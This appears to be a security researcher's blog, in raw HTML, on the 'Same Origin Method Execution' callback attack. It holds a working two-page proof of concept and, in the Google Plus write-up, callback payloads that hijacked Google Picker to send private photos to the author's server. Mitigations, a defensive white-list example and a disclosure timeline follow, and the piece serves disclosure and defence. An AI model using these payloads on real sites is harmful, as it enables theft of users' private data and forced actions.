<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwJTWykjsc5UxIocWaBe8A1MwHNBW-gaxVgPMsD2qP4YSMxIXr_K1MhrZL_YDS4XKfUiQ6AFJEo6f8x3Fvkig_7W4djFjLVjYPlcxSTXffngUf8l9IO62WhmSDK2HfGBw3bUlq1aaqbgw/s1600/blog_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwJTWykjsc5UxIocWaBe8A1MwHNBW-gaxVgPMsD2qP4YSMxIXr_K1MhrZL_YDS4XKfUiQ6AFJEo6f8x3Fvkig_7W4djFjLVjYPlcxSTXffngUf8l9IO62WhmSDK2HfGBw3bUlq1aaqbgw/s640/blog_1.png" width="95%" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Once the environment is ready, the initiating page (MAIN) shall redirect its document to any desired target page on the endpoint’s domain (http://www.vulnerable-domain.com/target_document).</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Following the redirection, the new browsing context (WIN1) shall wait for the targeted document’s DOM loading completion.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Once ready, for hijacking a method execution, the new browsing context (WIN1) would <b>redirect its document to the vulnerable instance</b> set with an arbitrary callback parameter, for example:<br /><br /><span style="color: #6fa8dc;">http://www.vulnerable-domain.com/flash-plugin.swf?callback=</span></span><span style="font-family: Arial, Helvetica, sans-serif;">opener.document.body.privateAlbum.firstChild.nextElementSibling.submit</span></li>
</ol>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Demo of designating the execution context for executing an alert:<br /><br /></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGRSqe1sKZXsHVxXH6MnxJ3TZ62vJAUWQlygQzG1qub7egQhU_Io6B8YEr4PdxBbBTjEw9gJVbZgEN0-oALRxXuxzyhLkdmgcDEI0DbQIbbwSWFfBuGKBdp7h9g9CUjc_RsE-h9AF38nE/s1600/blog_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGRSqe1sKZXsHVxXH6MnxJ3TZ62vJAUWQlygQzG1qub7egQhU_Io6B8YEr4PdxBbBTjEw9gJVbZgEN0-oALRxXuxzyhLkdmgcDEI0DbQIbbwSWFfBuGKBdp7h9g9CUjc_RsE-h9AF38nE/s1600/blog_2.png" width="95%" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: Arial, Helvetica, sans-serif;">PoC:</span></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">@Main Page:</span></div>
<div class="MsoNormal">
<div style="background: #202020; border-width: 1px; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #6ab825; font-weight: bold;"><script></span>
<span style="color: #6ab825; font-weight: bold;">function</span> <span style="color: #d0d0d0;">startSOME()</span> <span style="color: #d0d0d0;">{</span>
<span style="color: #24909d;">window</span><span style="color: #d0d0d0;">.open(</span><span style="color: #ed9d13;">"step1.html"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">location.replace(</span><span style="color: #ed9d13;">"http://www.vulnerable-domain.com/privateAlbum"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #24909d;">document</span><span style="color: #d0d0d0;">.body.addEventListener(</span><span style="color: #ed9d13;">"click"</span><span style="color: #d0d0d0;">,startSOME);</span> <span style="color: #999999; font-style: italic;">//Popup Blocker trick</span>
<span style="color: #6ab825; font-weight: bold;"></script></span>
</pre>
</div>
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">@step1.html:</span><br />
<br />
<div style="background: #202020; border-width: .0em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #6ab825; font-weight: bold;"><script></span>
<span style="color: #6ab825; font-weight: bold;">function</span> <span style="color: #d0d0d0;">waitForDOM()</span> <span style="color: #d0d0d0;">{</span>
<span style="color: #d0d0d0;">location.replace(</span><span style="color: #ed9d13;">"http://www.vulnerable-domain.com/flash-plugin.swf?callback=opener.document.body.privateAlbum.firstChild.nextElementSibling.submit"</span><span style="color: #d0d0d0;">);</span>
<span style="color: #d0d0d0;">}</span>
<span style="color: #d0d0d0;">setTimeout(waitForDOM,</span><span style="color: #3677a9;">3000</span><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;"></script></span>
</pre>
</div>
<br />
<br /></div>
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12.0pt; line-height: 107%;">Mitigation and Fix<o:p></o:p></span></b>
<br />
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><b>Static Callbacks</b> - Exploiting Same Origin Method Execution relies on abusing a callback parameter. Many web applications can keep their existing functionality without setting callbacks dynamically. Thus, when applicable, websites should use fixed callback values instead of exposing the callback name to external control.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><b>White-list approach – </b>In cases where the web application is designed to support more than a single callback per endpoint, or where a high degree of flexibility is important (common in Flash plugins), it is better to define a white-list and match the given callback parameter value against it. This enforces and verifies that only legitimate callback functions can execute.</span><br /><span style="font-family: Arial, Helvetica, sans-serif;">UPDATE: I am working on a JavaScript defense library aiming to serve as a generic and easy to deploy solution.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><b>Cross-Domain Messaging – </b>Use postMessage for notifying events and interacting across domains as an alternative to JavaScript callback execution (where applicable).</span></li>
</ol>
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
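<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">The mitigations above, as an added example that is not part of the original post or of any vendor's code: a Node-style handler for an OAuth/JSONP callback endpoint showing that the usual [A-Za-z0-9_.] filter still accepts a SOME-style dotted property path, the white-list check that rejects it, and the postMessage alternative with an explicit target origin. The callback names, origins, payload fields and function names are assumptions made for illustration.</span></div>

```javascript
// Added example, not code from the original post or from any of the
// vendors named above. It shows, for an OAuth/JSONP callback endpoint of the
// kind described in the post, why the usual character-class filter is not a
// defence against SOME, and how the "white-list" and "cross-domain messaging"
// mitigations look in code. ALLOWED_CALLBACKS, OPENER_ORIGIN, the token
// payload and all function names are assumptions made for illustration.

// The character class typically enforced on JSONP callback names
// (alphanumerics, underscore and dot).
const CALLBACK_CHARSET = /^[A-Za-z0-9_.]+$/;

// White-list: the only callback names the opener page actually registers.
// Hypothetical names; a real deployment lists its own.
const ALLOWED_CALLBACKS = new Set(['onContactsImported', 'onContactsDenied']);

// Origin of the page allowed to receive the token via postMessage
// (placeholder origin for this example).
const OPENER_ORIGIN = 'https://app.example';

// The charset filter alone. It blocks the punctuation XSS would need, but it
// accepts any dotted property path, which is exactly what SOME relies on.
function passesCharsetFilter(name) {
  return typeof name === 'string' && CALLBACK_CHARSET.test(name);
}

// White-list check: the value must equal one of the registered names
// verbatim. Returns the name on success, null otherwise.
function selectCallback(name) {
  if (typeof name !== 'string' || !ALLOWED_CALLBACKS.has(name)) {
    return null;
  }
  return name;
}

// Serialises the token object as a JavaScript literal. '<' is escaped so a
// string value containing "</script>" cannot close the script element, and
// the two Unicode line separators are escaped for older engines that treat
// them as line terminators inside string literals.
function toScriptLiteral(payload) {
  return JSON.stringify(payload)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Callback endpoint response using the white-list. Any other value, including
// a filter-clean SOME payload, gets a 400 and no script at all.
function renderCallbackPage(requestedCallback, payload) {
  const cb = selectCallback(requestedCallback);
  if (cb === null) {
    return { status: 400, body: 'Unknown callback' };
  }
  const body =
    '<html><body><script type="text/javascript">' +
    'if (window.opener && typeof window.opener.' + cb + ' === "function") {' +
    'window.opener.' + cb + '(' + toScriptLiteral(payload) + ');' +
    '}</script></body></html>';
  return { status: 200, body: body };
}

// Cross-domain messaging alternative: the endpoint hands the token to the
// opener with postMessage and a fixed target origin. No function name is
// taken from the URL, so there is nothing for a callback parameter to hijack.
function renderPostMessagePage(payload) {
  const body =
    '<html><body><script type="text/javascript">' +
    'if (window.opener) {' +
    'window.opener.postMessage(' + toScriptLiteral(payload) + ', ' +
    JSON.stringify(OPENER_ORIGIN) + ');' +
    '}</script></body></html>';
  return { status: 200, body: body };
}

// Opener-side handler for the postMessage flow: messages from any origin
// other than the callback endpoint's are ignored. Returns the accepted token
// string, or null when the message is rejected.
function acceptTokenMessage(event, expectedOrigin) {
  if (!event || event.origin !== expectedOrigin) {
    return null;
  }
  if (!event.data || typeof event.data.token !== 'string') {
    return null;
  }
  return event.data.token;
}
```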
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12.0pt; line-height: 107%;">Responsible Disclosure:<o:p></o:p></span></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="color: #e69138;">Oct 30, 2014: Google</span> </b>fixed a vulnerable instance –
Google Plus.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="color: #e69138;">Nov 06, 2014: Microsoft</span> </b>fixed a vulnerable instance –
Yammer.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 14.45pt; margin-bottom: .0001pt; margin-bottom: 0cm;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="color: #e69138;">April 21, 2015: Wordpress</span></b> fixed a vulnerable
instance – Plupload.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: 14.45pt; margin-bottom: .0001pt; margin-bottom: 0cm;">
<span style="font-family: Arial, Helvetica, sans-serif;">(Kudos to @zoczus for finding yammer and plupload instances)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The issue of callback exploitation is known to some extent in the infosec community, although until recently the attack did not receive enough attention. For that reason website owners, including the leading players, still rely on developers’ habits and experience. More importantly, no ‘best practice’ or standard has been published so far. Thus I chose to shed some light on Same Origin Method Execution and callback endpoints during the BlackHat conference. Several aspects of Same Origin Method Execution have been discovered by top researchers, namely Google's Aleksandr Dobkin and LinkedIn's Roman Shafigullin. They both certainly deserve credit here.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;">It is noteworthy that Google Bug Bounty deemed this attack’s impact similar to that of cross-site scripting. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Microsoft Bug Bounty deemed this attack’s impact similar to that of cross-site scripting.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">WordPress classified this attack as "XSS" in its critical security release (Apr. 2015 - <a href="https://wpvulndb.com/vulnerabilities/7933" target="_blank">WordPress 3.9-4.1.1 - Same-Origin Method Execution</a>).</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The Same Origin Method Execution attack can lead to ugly and critically severe consequences for its targeted victims. Keep in mind that the attack’s risk is considered as high as the risk of Cross-site scripting, rated the "third most risky attack" in the OWASP Top 10 project - that is A3 Cross-site scripting (XSS). To conclude, it is really important to abandon the misconception that a narrow set of allowed characters somehow guarantees the safety and security of your web applications. Further, we should strive to raise developers’ awareness of SOME.</span><br />
<div>
<br /></div>
</div>
</div>
<h2>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-large;">Stealing Private Photo Albums from Google - Same Origin Method Execution</span></h2>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Published 2015-05-25 (updated 2017-04-02).</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">It has been a long time since I updated this blog, as I have focused on company blogs and Black Hat presentations for the last couple of years. It is time to kick in with details about the vulnerable Google instance I demonstrated during my <a href="https://www.blackhat.com/eu-14/briefings.html#same-origin-method-execution-some-exploiting-a-callback-for-same-origin-policy-bypass">Black Hat EU presentation – Same Origin Method Execution</a>. Using that instance and a payload of only alphanumeric characters and a dot, I was able to hijack web functionality and thereby delete or steal private photo albums from Google Plus. A white paper is currently in review and will be released next week in my next post!</span></div>
<div class="MsoNormal">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_M0Qa_qngVdCZoJ71tnjI5IF2NbVJoPozXMo0gPzENhphDN463q5oqvRJenjklExwcscB4Qu6WshkSiNHUbHR8fvksrIqujvSW3NkNsnrOw-HmxtuHl0PNTslho_96NsSb8zLgcD1No/s1600/Presentation1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw_M0Qa_qngVdCZoJ71tnjI5IF2NbVJoPozXMo0gPzENhphDN463q5oqvRJenjklExwcscB4Qu6WshkSiNHUbHR8fvksrIqujvSW3NkNsnrOw-HmxtuHl0PNTslho_96NsSb8zLgcD1No/s400/Presentation1.png" width="97%" /></a></div>
<br />
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Same Origin Policy and OAuth overview:<o:p></o:p></span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">From time to time, and for numerous reasons, web applications interact with external third-party services. Some of these reasons are importing information (e.g. importing a contact list), notifying events, and getting delegated access to resources, such as providing "Login with" systems.</span><br /><br/>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSmGMXe1uCvg1gfxBluXhacL6V7rBDpBr-5dCxsHSqMCebFEfnQF8pTyrN1nl6weURagXK5JXhl4T4UzGf4cNPxLueSdUUS5L7-UjxYmjM8CYS9jsdQvgppwgZN-_ZrePq329YZ9bA9u8/" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSmGMXe1uCvg1gfxBluXhacL6V7rBDpBr-5dCxsHSqMCebFEfnQF8pTyrN1nl6weURagXK5JXhl4T4UzGf4cNPxLueSdUUS5L7-UjxYmjM8CYS9jsdQvgppwgZN-_ZrePq329YZ9bA9u8/" height="" title="Third-party example" width="320" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Since an external service often (if not always) means a different security context, interacting with it requires overcoming the Same Origin Policy (SOP). One of the most common interfaces for such third-party interaction these days is the OAuth dialog. OAuth dialogs are hosted by third-party resource providers and are designed to ask the resource owner (the user) to allow or deny the website access to the user's private resources. Once an answer is given, the dialog redirects (calls) the user back to a callback page hosted on the website which asked for access; this page is called the “callback endpoint”. The purpose of the callback endpoint is to receive a token from the third party and notify the requesting website. However, since no best practice exists for building callback endpoints, the technique web developers use to save the token and notify the initiating page (call it back) is based entirely on developers’ habits and experience. Therefore, callback endpoints often end up prone to “Same Origin Method Execution”.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">The vulnerable instance: <o:p></o:p></span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">How many times have you noticed a "Login with" button, or an option to import contacts or friend lists from a third-party service? </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://winsupersite.com/content/content/143969/ppl.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="" border="0" src="http://winsupersite.com/content/content/143969/ppl.jpg" height="200" title="importing contacts example" width="320" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">As on many other websites, Google Plus provides an option to import external contact information from third-party resource providers such as Yahoo and Microsoft. Prior to the responsible disclosure, the authorization process occurred as follows:</span><br />
<br />
<ol>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Google Plus </span><b style="font-family: Arial, Helvetica, sans-serif;">opened a pop-up</b><span style="font-family: "arial" , "helvetica" , sans-serif;"> for the OAuth dialog asking for delegated access to the user’s external contact list on Yahoo/Microsoft, so as not to lose the content of the currently open document.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">After the user allows or denies the access, the dialog window document is redirected to a Google Plus callback endpoint whose URL contains a <b>callback URL parameter</b>.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">The endpoint page uses the value provided by the parameter to </span><b style="font-family: Arial, Helvetica, sans-serif;">notify the opener and deliver the access token</b><span style="font-family: "arial" , "helvetica" , sans-serif;"> (JSONP style).</span></li>
</ol>
</div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Callback endpoint URL: <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://plus.google.com/c/u/0/auth?src=connectedaccounts&callback=<span style="color: orange;">callback_function_name</span>&dest=microsoft2&[...snip...]<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Accessing the callback endpoint URL directly responded with
the following markup:<o:p></o:p></span><br />
<br /></div>
<div class="MsoNormal">
<div class="MsoNormal">
<div style="overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #6ab825; font-weight: bold;"><html><body><script </span><span style="color: #bbbbbb;">type=</span><span style="color: #cccccc;">"text/javascript"</span><span style="color: #6ab825; font-weight: bold;">></span>
<span style="color: yellow;">window</span><span style="color: #d0d0d0;">.opener.</span><span style="color: orange;">callback_function_name</span><span style="color: #d0d0d0;">({</span><span style="color: #cccccc;">"status"</span><span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"token"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"ItHumYWI[...snip..]"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"oauthstate"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"1234"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"tokenid"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"ToKeN1234"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"tokenexp"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"0"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"gid"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"401223423.."</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"siteid"</span><span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">6</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"displayname"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"Ben Hayak"</span><span style="color: #d0d0d0;">,</span><span style="color: #cccccc;">"profileurl"</span><span style="color: #d0d0d0;">:</span><span style="color: #cccccc;">"http://profile-url.com"</span><span style="color: #d0d0d0;">});</span>
<span style="color: #6ab825; font-weight: bold;"></script></body></html></span>
</pre>
</div>
</div>
</div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Is that Cross-site scripting?</span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Of course the first thing to try here was Cross-site Scripting, although fortunately ;) as in most callback endpoint implementations, only a specific set of characters was allowed as a callback value, specifically alphanumerics, a dot and an underscore [A-Za-z0-9_\.]. We could still name functions like document.write, eval, etc., but as shown in the markup above, no user-controlled input gets inside the parentheses, so XSS is out of the question<b>.<o:p></o:p></b></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">“NULL means no!?” <o:p></o:p></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">When accessing the callback endpoint directly, the window.opener property is null, so it appears that the instance is not vulnerable. However, there is a technique to control the opener window. The first idea that came to mind was to create a bug chain by finding another page in Google Plus that would force opening a window with an arbitrary URL, and combining that with the callback endpoint. However, such a page is a little too rare and relying on it would weaken the attack.<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Window Objects in memory:<o:p></o:p></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">So let’s try a different approach. I wanted to entirely control a window, set its document to any page in Google Plus, and then tell the Google Plus callback endpoint “This is your opener window, deal with it”. That’s exactly what you can achieve with “Same Origin Method Execution”: all you need is a page that opens another window and a set of redirections, and you can designate any window as the opener and start hijacking methods! The key element that makes this a successful approach is the nature of user agents. When a window's <b>document</b> is redirected, its window object remains at the originally allocated memory space; therefore any other window that holds a reference to it as “opener” can still use that reference to access the opener window even after the document has changed/redirected.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">If window A opens window B, the user agent creates a reference to window A as the window.opener property of window B. When window A’s document changes (redirects), the reference is not cleared or deleted, and window B can still use the opener property to reference it.<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">So the answer is pretty clear: all that’s left is to make a malicious HTML page that opens another window via “<i>window.open(‘/step1.html’)</i>”, then redirect the first window to a designated document on Google Plus, and redirect the pop-up window to the callback endpoint. This way you can set any page as the opener of the callback endpoint.<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTyXjXreDx0NCyDTQ30pQsAmvdJxKJhoXmT3QEVQJzHXhhb19J5BuWNF0JkAu3A3uxLy-3UAZhk0Uo3GbQpMtOUIJDpGQWVApK3agV44FIVpTaALZot5Uesbu8ChQQXJVnxBsIM9bjNhk/s1600/o-SINGLE-WOMAN-facebook.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTyXjXreDx0NCyDTQ30pQsAmvdJxKJhoXmT3QEVQJzHXhhb19J5BuWNF0JkAu3A3uxLy-3UAZhk0Uo3GbQpMtOUIJDpGQWVApK3agV44FIVpTaALZot5Uesbu8ChQQXJVnxBsIM9bjNhk/s400/o-SINGLE-WOMAN-facebook.jpg" width="400" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Stealing Private Photo Albums with SOME:<o:p></o:p></span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">I covered how to control an opener and abuse a vulnerable callback endpoint to execute any DOM/JavaScript function in the context of the opener window. All that’s left is to choose a page containing an interesting web functionality and use only <span style="color: #f6b26b;">alphanumeric characters and a dot</span> to assemble a payload that will hijack this web functionality (similar to the impact of CSRF, but without having to care about CSRF tokens or other protective mechanisms).
<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The target document I used:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Google Plus can automatically back up private phone photos to Google servers if G+ is installed as a mobile application on your phone. Fortunately, Google created a service called “Google Picker” which allows users to share their photos, videos and documents stored on Google servers with third-party websites.</span></div>
<div class="MsoNormal">
<br />
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Now that I've designated a target document (Google Picker) I setup the attack page as follows:</span></div>
</div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo2; text-indent: -18.0pt;">
<ol>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Set up a page that </span><b style="font-family: Arial, Helvetica, sans-serif;">opens two pop-up windows</b><span style="font-family: "arial" , "helvetica" , sans-serif;"> in order to control their opener.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Redirect</b> the page to the Google Plus instance of Picker.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Wait for the DOM to finish loading.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Redirect</b> the first pop-up to the vulnerable callback endpoint with the callback parameter set to: </span><i style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #f6b26b;">document.activeElement.parentElement.parentElement.parentElement.previousSibling.lastChild.click</span></i></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Redirect</b> the second pop-up to the vulnerable callback endpoint with the callback parameter set to: </span><i style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #f6b26b;">pickerApp.V.Fa.PA</span></i><span style="font-family: "arial" , "helvetica" , sans-serif;">, which made the service send all the selected photos to my own domain.</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Send the malicious setup to a chosen victim (in my case, Google Bug Bounty responsible disclosure :)</span></li>
</ol>
</div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The exploit resulted in hijacking the following JavaScript
functions:</span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<ol>
<li><i style="font-family: Arial, Helvetica, sans-serif;">window.opener.document.activeElement.parentElement.parentElement.parentElement.previousSibling.lastChild.click({JSONDATA});</i></li>
<li><i style="font-family: Arial, Helvetica, sans-serif;">window.opener.pickerApp.V.Fa.PA({JSONDATA});</i></li>
</ol>
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">This flow could make any user send every single photo from his/her private album to my server.</span><o:p></o:p><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>BlackHat EU Video:</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/s_vi/mYaNzLTb380/default.jpg?sqp=CNzOjKsF&rs=AOn4CLD3OAijMmD3tnyj8Q69Yys_zMsGHQ" frameborder="0" height="266" src="https://www.youtube.com/embed/mYaNzLTb380?feature=player_embedded" width="320"></iframe></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Additional use cases: </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">I exploited the same instance to delete Google Plus timeline posts. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
